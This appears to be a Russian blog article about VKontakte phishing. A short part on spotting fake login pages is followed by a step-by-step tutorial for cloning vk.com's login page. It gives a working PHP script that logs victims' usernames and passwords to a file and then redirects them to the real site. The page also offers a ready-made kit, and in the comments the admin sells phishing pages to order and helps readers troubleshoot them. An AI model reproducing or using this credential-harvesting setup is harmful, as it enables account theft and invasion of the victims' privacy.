Как не попасться на фишинговый сайт?

В этой статье я расскажу, что такое фишинг вконтакте. Как не попасться на фишинговый сайт, и не спалить свои учетные данные. Также приведу пример создания такого сайта.

Что такое фишинг?

Вообще слово fishing переводится как рыбалка. Фишинг — это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек «редиска» узнает ваши учетные данные, и может входить под вашим логином на сайт.

Будьте внимательными

Как вам могут подсунуть такой сайт, есть пару примеров.

  1. На любом ресурсе может быть ссылка, в которой говорится: «добавь меня в друзья и получи за это 10 голосов вконтакте». Согласитесь, заманчиво? Жертва переходит по этой ссылке, попадает на сайт вроде бы ничем не отличающийся от сайта вконтакте, вводит «логин» и «пароль». Попадает себе на страничку, голосов не прибавилось. Долго думает и в итоге забивает на это дело, а данные от учетной записи уже у «редиски».
  2. Ваша девушка или парень, дает вам ссылку на сайт, с предлогом лайкни Кота =) Вы без задней мысли переходите по ссылке, вводите «логин» и «пароль». И ваша вторая половинка теперь знает ваши учетные данные, и сможет посмотреть с кем это вы там переписываетесь =)

И еще куча вариантов, как можно заманить жертву на такой вот сайт.

Смотрите куда вы переходите, если вы сидите в данный момент в контакте и вам дают ссылку, вы по ней переходите, видите страницу авторизации, у вас сразу же должно закрасться подозрение. Обратите внимание на адрес сайта. Допустим вконтакте, адрес его: vk.com или vkontakte.ru. Не многие могут запомнить длинные доменные имена сайтов, их легче всего подделать. Я думаю из-за этого социальная сеть вконтакте, перешла на столь короткий доменный адрес, чтобы его было труднее подделать. Если вы увидите адрес vk.org то вы особо и не увидите подвоха, если после него чего-нибудь написать, например: так вообще адрес как адрес. Ну так вот, если вас где-то просят ввести пароль, проверяйте внимательно доменный адрес.

Создание фишинг сайта

Данный материал приводится сугубо для ознакомления, а не для ломания учетных записей своих знакомых и друзей, также помните, что это уголовное дело.

И так приведу пример создания фишингового сайта для социальной сети вконтакте.

Открываем любой браузер, заходим по адресу vk.com,

адресная строка вашего браузера

жмем файл => сохранить как =>

рабочий стол вашего компьютера

Имя файла: index.html

Тип файла: Веб – страница, полностью с картинками. Жмем кнопку, Сохранить.

Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его icq.php

Открываем блокнот и вставляем туда этот код.

<?

$Login = $_POST[zabor]; // Логин  жертвы

$Pass = $_POST[‘zena’]; // Пароль жертвы

$log = fopen(«ups.php»,»a+»); //тут будут лежать пароли жертв

fwrite($log,»<br> $Login:$Pass \n»); //производим запись в ups.php

fclose($log); //закрывает ups.php

echo «<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=http://vkontakte.ru’></head></html>»; // перенаправляем жертву на http://vk.com

?>

Закрываем и сохраняем как icq.php

Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим <form жмем enter.

Он найдет строчку:

<FORM name=»login» id=»quick_login_form» onsubmit=»if (vklogin) {return true} else {quick_login();return false;}» action=»https://login.vk.com/?act=login» method=»POST»>

Меняем её на это:

<FORM name=»login» id=»quick_login_form» onsubmit=»if (vklogin) {return true} else {quick_login();return false;}» action=»icq.php» method=»POST»>

Дальше, смотрим чуть ниже и находим строчку:

<INPUT name=»email» id=»quick_email» onfocus=»show’quick_expire’)» type=»text»>

Меняем на это:

<INPUT name=»zabor» id=»quick_email» onfocus=»show(‘quick_expire’)»type=»text»>

Смотрим еще чуть ниже и находим строчку:

<INPUT name=»pass» id=»quick_pass» onfocus=»show(‘quick_expire’)»type=»password»>

Меняем на это:

<INPUT name=»zena» id=»quick_pass» onfocus=»show(‘quick_expire’)»type=»password»>

Дальше необходимо кнопку «Войти» включить в форму, чтобы она работала, для этого, находим чуть ниже закрывающийся тег </form>, вырезаем его и вставляем его вот тут.

<DIV class=»button_blue button_wide»><BUTTON id=»quick_login_button»>Войти</BUTTON></form></DIV>

Сохраняем index.html, и у вас в итоге получилось два файла файла и одна папка. Дальше все это дело нужно будет залить на ваш хостинг. Вот этим https://beget.com можно месяц бесплатно пользоваться, можно купить на месяц,  всего 150 рублей. Я думаю, вы умеете это делать, если нет, задайте вопрос в комментариях.

Когда жертва зайдет на вашу страничку фишинговую, введет «логин» и «пароль», у вас создатся на хостинге еще один файл, ups.php в нем и будут храниться учетные записи.

Рассказ о том как залить все это дело на хостинг

Вывод

В этой статье вы узнали, как себя обезопасить и не попасться на фишинговый сайт. Как создать фишинговый сайт. Скачать готовый, фишинг для вконтакта, можно ниже, для ознакомительных целей.


(adsbygoogle = window.adsbygoogle || []).push({});

Скачать готовый фишинговый сайт для вконтакте.

Друзья, пройдите опрос на тему какие еще фишинги можно сделать и нужны ли они у нас в группе:https://vk.com/27sysday

В связи с большим количеством обращений, решил создать услугу по настройке.

Что понадобится

  1. Вам нужно зарегистрироваться https://beget.com
  2. Связать со мной в скайпе spbskull.
  3. Сказать мне логин и пароль.
  4. Пополнить баланс телефона на 1000 рублей (тел. скажу в скайпе).
  5. Через час после оплаты, получите готовое решение.

Фишинг атаки как не попасть в ловушку

Помогла статья? Оцените её
Очень плохоПлохоСреднеХорошоОтлично
Оценок: 6
Загрузка...
Комментарии
  1. Вася

    Меня на моем хостинге попросили убрать фишинговый сайт. А на том, который Вы рекомендуете, так не сделают?

    • Admin

      Пока все хорошо

    • Admin

      меня еще не попросили за год, не палите его

  2. Менталист

    Админ а ты в ВК есть дай мне свой Id Адрес я тут кое что не понимаю нужно поговорить

    • Admin

      ищи на сайте, все контакты есть

  3. ggg

    плез сними лучше видео я пытаюсь сделать но не понимаю

  4. Дима

    А » одноклассников» можно?

    • Admin

      тот же самый принцип

  5. Anonimus

    Все по другому не могу нечего сделать помогите что у вас за {windows}
    это первое
    2)-лучше ролик выложи как это все делаешь что бы понятнее было
    3)- Пиши все подробно желательно с картинками что бы было понятнее

    • Admin

      семерка у меня стояла ТОГДА

  6. Аноним

    нет строчки FORM

    • Admin

      Ну смотрите лучше, я смотрю у меня есть, а вы смотрите у вас нет

  7. Аноним

    в блокноте не может найти <from
    что делать???

    • Admin

      Только что проверил, все он находит, возможно вы что-то сделали не так, попробуйте снова все сделать с нуля.

    • Иван

      у Вас написано from а надо form

  8. виталик

    хочу заказать фишинг.это можно у вас?

    • Admin

      можно

  9. www

    Из-за чего в файле где должны сохранять пароли, сохраняется только двоеточие типа : ?

    • Admin

      Права на запись дали?

  10. Юлиан

    Извините за такой вопрос, но как залить эти файлы на хостинг???

    • Admin

      Добавил видео в статью.

  11. Сергей

    У меня есть готовый фейк который вы можете скачать и подсунуть его друзьям

  12. Артур

    Будет ли обновление, т.к. сайт вк изменился?

    • Admin

      А надо опрос провести, требуется ли вообще это кому-то кроме вас.

      • erick

        Да,думаю будет очень полезно,обновите пожалуйста

  13. info

    Друг не надо так )) Тебя за это могут хлопнуть.
    Нарушаешь пару законов.
    1) Не законное копирование и изменение материалов сайта. С целью продажи.
    2) Соучастие в хищении данных пользователя. А представь синий кит угнать захотел ак школьника , ты им помог , школьник руки на себя наложил, в итоге оба уехали на 8 лет.
    3) Доход не обложенный налогами. За то что зарабатываешь у нас в стране надо платить.
    А так статья норм )) Знакомый скинул оценить.

  14. антон

    давайте проведем опрос? сколько вам не жалко потратить денег на такую услугу, по созданию сайта?

  15. Аноним

    А можно создать страницу мне фишинг яб те заплатил мне прост нада взломать вк

    • Admin

      можно

      • Павел

        Можете сделать фишинговый сайт на заказ?

        • Admin

          Можно

          • напишите мне

            напишите свою почту хочу заказать

            • Admin

              В ВК ПИШИТЕ

      • Жандос

        услуга сколько стойт

        • Admin

          1500

  16. Артур

    При попытке зайти на сайт всплывает сообщение, что он не прилинкован. Хотя я проверял на beget, что линк стоит. Как можно открыть сайт?

    • Admin

      это лучше в ТП написать им

  17. ARTES

    Здравствуйте!Простите пожалуйста за тупой вопрос,я создал хостинг,как теперь залить и что собственно из 3 компонентов заливать??

  18. Влад

    При вводе данных(логина и пароля) в документ приходит ВСЕГДА вот ето
    вв:вв
    5555555:7777777777
    Что не так!?

    • Admin

      Права на файил посмотрите

      • илья

        почему у меня не находит строчку <FORM ?

        • Admin

          Попробуйте сделать все снова

  19. Денис

    Есть видео урок?

    • вадим

      могу помочь

    • Антон

      Да тут же и так все понятно, если будет много просьб сделаю.

Добавить комментарий

Вверх
Adblock detector